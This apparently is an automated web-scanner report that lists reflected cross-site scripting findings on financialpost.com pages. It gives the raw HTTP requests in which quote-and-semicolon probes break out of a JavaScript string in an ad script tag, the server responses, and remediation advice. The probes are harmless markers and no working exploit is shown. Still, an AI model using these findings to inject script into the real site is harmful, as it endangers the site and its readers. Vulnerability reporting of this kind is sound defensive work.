This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /opinionc8d26'%3b3b9f28c8209/columnists/peter-foster.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response
HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:12:55 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:12:55 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 44282
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 71174'%3b881fe5fc1ca was submitted in the REST URL parameter 2. This input was echoed as 71174';881fe5fc1ca in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /opinion/columnists71174'%3b881fe5fc1ca/peter-foster.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response
HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:13:04 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:13:04 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 37582
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f7ce7'%3b6e16cbc7aac was submitted in the REST URL parameter 3. This input was echoed as f7ce7';6e16cbc7aac in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /opinion/columnists/f7ce7'%3b6e16cbc7aac HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response (redirected)
HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:13:16 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:13:16 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 37558
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c0c9f'%3bcdf561736ea was submitted in the REST URL parameter 1. This input was echoed as c0c9f';cdf561736ea in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /opinionc0c9f'%3bcdf561736ea/columnists/terence-corcoran.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response
HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:12:25 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:12:25 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 43502
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8e6c6'%3bb941a57f648 was submitted in the REST URL parameter 2. This input was echoed as 8e6c6';b941a57f648 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /opinion/columnists8e6c6'%3bb941a57f648/terence-corcoran.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response
HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:12:29 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:12:29 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 43466
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 79ea8'%3b6fc2681cae2 was submitted in the REST URL parameter 3. This input was echoed as 79ea8';6fc2681cae2 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /opinion/columnists/79ea8'%3b6fc2681cae2 HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response (redirected)
HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:12:35 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:12:35 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 37558
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1008f'%3b2d6e85acc6d was submitted in the REST URL parameter 1. This input was echoed as 1008f';2d6e85acc6d in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /opinion1008f'%3b2d6e85acc6d/columnists/william-hanley.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response
HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:12:58 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:12:58 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 43481
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ae8cb'%3b2ecc1657740 was submitted in the REST URL parameter 2. This input was echoed as ae8cb';2ecc1657740 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /opinion/columnistsae8cb'%3b2ecc1657740/william-hanley.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response
HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:13:05 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:13:05 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 43445
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3cf85'%3b041ad7667b4 was submitted in the REST URL parameter 3. This input was echoed as 3cf85';041ad7667b4 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /opinion/columnists/3cf85'%3b041ad7667b4 HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response (redirected)
HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:13:23 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:13:23 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 43401
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 84eb2'%3b2bb55a25061 was submitted in the REST URL parameter 1. This input was echoed as 84eb2';2bb55a25061 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /personal-finance84eb2'%3b2bb55a25061/ HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response (redirected)
HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:10:53 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:10:53 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 43309
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1558b'%3bef88a93e159 was submitted in the REST URL parameter 1. This input was echoed as 1558b';ef88a93e159 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /personal-finance1558b'%3bef88a93e159/Christmas+hardest+time+sell+best+time/3995600/story.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response
HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 80706
Expires: Sun, 19 Dec 2010 03:11:41 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:11:41 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/personal-finance1558b';ef88a93e159/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=personal-finance1558b';ef88a93e159;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=34922104?">
...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 74102'%3b83caa696128 was submitted in the REST URL parameter 3. This input was echoed as 74102';83caa696128 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /personal-finance/Christmas+hardest+time+sell+best+time/399560074102'%3b83caa696128/story.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response
HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 70553
Expires: Sun, 19 Dec 2010 03:11:53 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:11:53 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co ...[SNIP]... <script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/personal-finance/christmas-hardest-time-sell-best-time/399560074102';83caa696128/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=personal-finance;kw=christmas-hardest-time-sell-best-time;kw=399560074102';83caa696128;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+su ...[SNIP]...
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a6b22'%3b240f9e32f57 was submitted in the REST URL parameter 4. This input was echoed as a6b22';240f9e32f57 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /personal-finance/Christmas+hardest+time+sell+best+time/3995600/a6b22'%3b240f9e32f57 HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response (redirected)
HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:12:10 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:12:10 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 44637
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 820b5'%3be19f1fa9fd was submitted in the REST URL parameter 1. This input was echoed as 820b5';e19f1fa9fd in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /personal-finance820b5'%3be19f1fa9fd/Does+diabetes+qualify+disability+credit/3994512/story.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response
HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 79835
Expires: Sun, 19 Dec 2010 03:10:51 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:10:51 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co ...[SNIP]... <script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/personal-finance820b5';e19f1fa9fd/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=personal-finance820b5';e19f1fa9fd;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=24161567?"> ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ce248'%3bd1f8406fe84 was submitted in the REST URL parameter 3. This input was echoed as ce248';d1f8406fe84 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /personal-finance/Does+diabetes+qualify+disability+credit/3994512ce248'%3bd1f8406fe84/story.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response
HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 71495
Expires: Sun, 19 Dec 2010 03:11:20 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:11:20 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co ...[SNIP]... <script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/personal-finance/does-diabetes-qualify-disability-credit/3994512ce248';d1f8406fe84/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=personal-finance;kw=does-diabetes-qualify-disability-credit;kw=3994512ce248';d1f8406fe84;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+ ...[SNIP]...
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload aa5eb'%3b0000bb3f5a6 was submitted in the REST URL parameter 4. This input was echoed as aa5eb';0000bb3f5a6 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /personal-finance/Does+diabetes+qualify+disability+credit/3994512/aa5eb'%3b0000bb3f5a6 HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response (redirected)
HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:11:32 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:11:32 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 44637
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ca37c'%3bd9a5baaf693 was submitted in the REST URL parameter 1. This input was echoed as ca37c';d9a5baaf693 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /personal-financeca37c'%3bd9a5baaf693/Elderly+brain+makes+riskier+investments/3983726/story.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response
HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 81437
Expires: Sun, 19 Dec 2010 03:11:44 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:11:44 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co ...[SNIP]... <script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/personal-financeca37c';d9a5baaf693/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=personal-financeca37c';d9a5baaf693;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=32472151?"> ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 565bd'%3b35fb979a5ac was submitted in the REST URL parameter 3. This input was echoed as 565bd';35fb979a5ac in the application's response.
